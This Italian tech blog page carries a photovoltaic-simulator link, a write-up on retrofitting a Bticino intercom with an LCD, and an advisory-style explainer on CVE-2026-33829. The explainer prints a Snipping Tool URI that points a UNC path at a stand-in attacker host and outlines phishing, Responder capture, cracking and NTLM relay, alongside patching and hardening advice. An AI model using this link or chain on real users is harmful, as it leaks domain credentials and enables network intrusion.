https://sites.google.com/view/simfotovoltaico
Liberi Pensieri di Marco Mira
Aggiornamenti informatici e piccoli trucchetti nella vita quotidiana di un lavoratore statale addetto alla gestione di server e reti. Quando un pensiero mi passa per la mente lo scrivo...
ADS
giovedì 14 maggio 2026
Un comodo Simulatore di Fotovoltaico
https://sites.google.com/view/simfotovoltaico
mercoledì 13 maggio 2026
Recupero e Modernizzazione: Sostituire il Monitor CRT di un Videocitofono Bticino Swing con un Display LCD
Spesso ci troviamo a gestire vecchi impianti di videocitofonica che, pur funzionanti nella logica di base, soffrono di obsolescenza tecnologica nei componenti visuali. È il caso del classico modulo interno Bticino Swing, equipaggiato originariamente con un piccolo tubo catodico (CRT) o primi modelli LCD ormai fuori produzione.
Dopo oltre due anni di sperimentazioni, errori e ripensamenti, presentiamo oggi il risultato finale di un progetto di "retrofit": la sostituzione del monitor originale Hanse (4 pollici TTF LCD) con un moderno pannello LCD da 4,3 pollici, comunemente utilizzato come monitor per retromarcia automobilistica.
La Sfida Tecnica
L'obiettivo era chiaro: mantenere l'estetica originale della cornetta Bticino sostituendo però il cuore tecnologico guasto o obsoleto. Il primo tentativo ha purtroppo portato a un blocco del sistema a causa di un adattamento errato, costringendo a utilizzare il citofono in modalità audio-only per lungo tempo. La lezione appresa? La pazienza e la precisione nei collegamenti sono fondamentali.
La seconda prova, quella definitiva, ha visto l'impiego di un monitor LCD da 4,3" con alimentazione a 12V. (link non affiliato)
Il Processo di Adattamento
L'intervento ha richiesto una modifica meccanica ed elettronica accurata:Smontaggio e Preparazione: È stato necessario rimuovere il tubo catodico e la scheda di controllo originale dal telaio plastico del modulo Bticino. Successivamente, il display è stato estratto dal suo contenitore plastico commerciale.
Modifica del Telaio: Per alloggiare il nuovo pannello, il telaio plastico originale è stato limato con precisione per ricavare lo spazio necessario, posizionando il nuovo LCD esattamente dove si trovava il vecchio monitor.
Elettronica e Sicurezza: Il connettore originale a 4 poli non era compatibile con le nuove esigenze. La soluzione è stata recuperare una morsettiera da un vecchio ricevitore FAAC.Dettaglio cruciale: Poiché il nuovo display assorbe circa 180mA, è stato inserito in serie all'alimentazione un fusibile da 250mA per proteggere il circuito da eventuali cortocircuiti o picchi di tensione.
Calibrazione: La regolazione di luminosità e contrasto è stata effettuata a citofono aperto durante la fase di collaudo, agendo sulla piccola PCB con tre pulsanti presente sul retro del display, che è stata lasciata nascosta all'interno del guscio.
Il Risultato Finale
Il sistema è ora pienamente operativo. La nuova integrazione permette di visualizzare il video con un ingombro minimo e un consumo energetico contenuto.
Nota sulla qualità video: Durante i test è emerso che la qualità dell'immagine, seppur accettabile sul nuovo schermo, risulta limitata non dal display LCD (che ha una buona risoluzione), ma dal vetrino del modulo camera esterno (PE). Dopo anni di esposizione agli agenti atmosferici, la lente esterna si è opacizzata, riducendo la nitidezza in ingresso. Questo conferma che, in questi recuperi, la catena della qualità è forte quanto il suo anello più debole: in questo caso, la camera esterna andrebbe pulita o sostituita per sfruttare appieno il nuovo monitor.
Conclusioni
Questo progetto dimostra come, con un po' di manualità e componenti di recupero o economici (come i monitor per auto), sia possibile dare una seconda vita a dispositivi che sembravano destinati alla discarica elettronica. Il rispetto per l'hardware esistente e la capacità di adattarlo alle tecnologie moderne è la chiave per un'elettronica più sostenibile e duratura.
Grazie al nostro collaboratore anonimo per aver condiviso questa dettagliata documentazione tecnica.
giovedì 7 maggio 2026
CVE-2026-33829 - Lo Snipping Tool che regala il tuo hash NTLM
Il succo della faccenda: clicci su un link, si apre lo Strumento di cattura di Windows come se niente fosse, e nel frattempo il tuo hash NTLMv2 (derivato dalla tua password di dominio o account locale) vola silenzioso verso un server controllato dall'attaccante. Nessun warning, nessun popup sospetto, zero sintomi visibili.
La Radice Tecnica
Lo Snipping Tool registra nel sistema un URI handler personalizzato chiamato ms-screensketch: (e ms-screenclip:), usato per aprire direttamente l'app tramite link dal browser o da altre app. Questo URI accetta un parametro filePath per indicare il file da aprire/modificare.
filePath. Un attaccante può passargli un UNC path invece di un percorso locale:ms-screensketch:edit?filePath=\\\\attacker.evil.com\\share\\badge.png
Quando Windows vede un percorso UNC (\\server\share\file), fa automaticamente una connessione SMB verso quel server. E quando apre una connessione SMB autenticata, trasmette automaticamente la risposta Net-NTLMv2 - ovvero un hash crittografico derivato dalla tua password - al server remoto.
Ecco un esempio fatto semplicemente su una cartella mappata:
La Catena d'Attacco (Attack Chain)
Preparazione: L'attaccante mette in piedi un server SMB malevolo (es. con Responder) e crea un link
ms-screensketch:con UNC path che punta a quel serverDelivery: La vittima riceve il link via phishing email, pagina web compromessa, o messaggio Teams/Slack — mascherato da qualcosa di plausibile (es. "ritaglia la tua foto per il badge aziendale")
Esecuzione: La vittima clicca e conferma l'apertura dello Strumento di cattura (unica interazione richiesta)
Esfiltrazione silenziosa: Lo Snipping Tool tenta di caricare il file remoto via SMB → Windows invia automaticamente l'hash Net-NTLMv2 all'attaccante
Post-exploitation: L'hash può essere:
Craccato offline con Hashcat/John the Ripper per recuperare la password in chiaro
Usato direttamente in un attacco NTLM Relay per autenticarsi ad altri servizi interni senza neanche craccare
Dati della Vulnerabilità
| Campo | Dettaglio |
|---|---|
| CVE | CVE-2026-33829 nvd.nist |
| CVSS 3.1 | 4.3 (Medium) technochat |
| CWE | CWE-200 – Exposure of Sensitive Information |
| Componente | Windows Snipping Tool (ms-screensketch: URI) |
| Scoperta da | Marcos Díaz Castiñeiras – BlackArrow (Tarlogic) linkedin |
| Segnalata a Microsoft | 23 marzo 2026 redhotcyber |
| Patch rilasciata | 14 aprile 2026 (Patch Tuesday) technochat |
| PoC pubblico | Sì, GitHub BlackArrow github |
Perché il CVSS 4.3 Sottostima il Rischio Reale
Il punteggio "Medium" può ingannare. In ambienti Active Directory aziendali questo è un cazzo di problema serio per due motivi: [cybersecuritynews]
NTLM Relay: In reti dove NTLM non è bloccato/disabilitato e SMB signing non è enforced, l'hash può essere riutilizzato in tempo reale per autenticarsi a file server, SharePoint, Exchange senza craccare nulla
Surface d'attacco enormissima: Lo Snipping Tool è preinstallato su ogni build di Windows, quindi potenzialmente colpisce ogni macchina Windows aziendale non aggiornata
Il MITRE ATT&CK mapping rilevante è T1550.002 – Pass the Hash per il movimento laterale.
Come Proteggersi
Fix immediato (obbligatorio):
Installare gli aggiornamenti di sicurezza di aprile 2026 su tutte le macchine Windows [redhotcyber]
Misure di hardening aggiuntive:
Bloccare il traffico SMB in uscita (porta 445) al perimetro della rete non dovrebbe mai uscire dall'infrastruttura interna [redhotcyber]
Monitorare connessioni SMB anomale in uscita con SIEM/EDR; BlackArrow ha già pubblicato query KQL specifiche per Microsoft Defender XDRx
Considerare la disabilitazione di NTLM dove possibile in favore di Kerberos (GPO:
Network security: Restrict NTLM)Abilitare SMB Signing obbligatorio su tutti i server per mitigare i relay attack
Per i Blue Team, SOC Prime ha già regole di detection dedicate per questo CVE.
Contesto Storico: Non è la Prima Volta
Questo attacco si inserisce in un pattern più ampio di URI handler abuse su Windows. Già nel 2025 era stata documentata una tecnica analoga con lo schema ms-photos:, e ad aprile 2026 era emerso un bug simile in Explorer (CVE-2026-32202) dove una patch Microsoft aveva essa stessa introdotto un leak di credenziali. Il problema sistemico è che Windows espone decine di URI handler registrati dalle sue app native, e la validazione dell'input in questi handler è storicamente lacunosa.
Verifica protezione
Se hai da WINVER una versione superiore a quella indicata in tabella ... Sei OK!
| Versione Windows | Build minima protetta | Come verificare |
|---|---|---|
| Win 11 25H2 | 26200.8246 | winver oppure PowerShell |
| Win 11 24H2 | 26100.8246 | winver oppure PowerShell |
| Win 11 23H2 | 22631.6936 | winver oppure PowerShell |
| Win 10 22H2 | 19045.5858 | winver oppure PowerShell |